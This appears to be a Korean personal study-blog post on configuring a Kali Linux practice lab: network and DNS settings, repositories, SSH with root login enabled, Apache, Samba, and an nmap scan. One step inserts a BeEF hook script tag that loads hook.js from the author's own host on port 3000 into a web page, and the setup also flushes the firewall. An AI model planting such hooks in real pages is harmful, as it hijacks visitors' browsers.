-
[해킹] 칼리리눅스 설정작업공부/해킹 2024. 3. 13. 11:45
해당 실습 과정 배포판 버전, 코드명 네트워크 설정
1. 인터페이스 파일의 구성 내역 확인
cat /etc/network/interfaces 2. 현재 IP 확인
ifconfig 3. 유동 IP -> 고정 IP로 변경
vi /etc/network/interfaces - address를 ifconfig로 확인한 ip 주소로 설정
- network는 netmask가 255.255.255.0이라서 192.168.178.0으로 설정
- gateway 192.168.178.2로 설정
- broadcast는 192.168.178.255로 마지막 주소로 설정
4. DNS서버 IP 주소 변경
vi /etc/resolv.conf - 첫번째 nameserver는 자신의 게이트웨이 주소로 설정
- 두번째 nameserver는 자신의 IP 주소로 설정
- 세번째 nameserver는 8.8.8.8(구글 DNS 서버)
5. DNS 서버 IP 주소 설정 상태 확인
ping 8.8.8.8 저장소 설정
1. 저장소 목록 확인
cat /etc/apt/sources.list 2. 이전에 작업한 내용 지우기
apt-get clean 3. 최신 프로그램 목록 확인
apt-get update SSH 서비스
1. SSH 서비스 설치
apt-get install openssh-server 2. 루트 계정으로 SSH 서버에 원격접속 가능 설정
cat /etc/ssh/sshd_config 3. PermitRootLogin prohibit-password -> PermitRootLogin yes로 변경
vi /etc/ssh/sshd_config 4. SSH 서비스를 칼리 운영체제 시작프로그램 등록
service ssh start update-rc.d ssh enable 5. sudo passwd로 비밀번호 설정
sudo passwd 6. root 권한으로 로그인 가능한지 SSH 서비스 확인
ssh localhost PuTTY
https://www.putty.org/Download PuTTY - a free SSH and telnet client for Windows
Is Bitvise affiliated with PuTTY? Bitvise is not affiliated with PuTTY. We develop our SSH Server for Windows, which is compatible with PuTTY. Many PuTTY users are therefore our users as well. From time to time, they need to find the PuTTY download link. W
www.putty.org
1. PuTTY로 kali의 SSH 접속
자신의 IP 주소를 입력, 포트번호 22, SSH로 접속 2. 테스트 파일 만들어서 확인
웹 페이지 설정
1. BeEF 도구를 이용한 침투 테스트 설정
cat > /var/www/html/index.html - 파일을 내용을 덮어씌운다는 뜻입니다.
- 입력 후 (ctrl + c)로 공백을 덮어씌웁니다.
vi /var/www/html/index.html - 내용을 위에 사진과 같이 편집
- <script src ="http://자신의 ip 주소:3000/hook.js"></script>
2. 기본 웹 페이지 경로 확인
3. 아파치 구성 파일에서 기본 웹 페이지 경로 확인
4. 아파치 구성 파일에서 기본 웹 페이지 경로 변경
- 해당 코드를 위와 같이 수정해줍니다.
5. 아파치2 시작
service apache2 start 6. localhost로 확인
body 태그에 입력한 TEST가 나오면 성공 삼바 설치
1. 설치
apt-get install samba smbclient cifs-utils 2. /etc/samba/smb.conf 파일 수정
3. IPTables 방화벽 설정 초기화
iptables -F && iptables -L 4. smb.conf 설정 파일 반영
service smbd restart 5. 삼바 서비스 구동 확인
- 139, 445 포트가 대기 상태이면 삼바 서비스가 성공적으로 동작하는 것입니다.
6. 칼리 시작과 동시에 해당 서비스를 자동 구동
update-rc.d smbd enable 7. NMAP 도구를 이용해 포트 스캔
nmap 127.0.0.1 '공부 > 해킹' 카테고리의 다른 글
[해킹] MSF 보조 기능을 이용한 무차별 대입공격 (0) 2024.03.27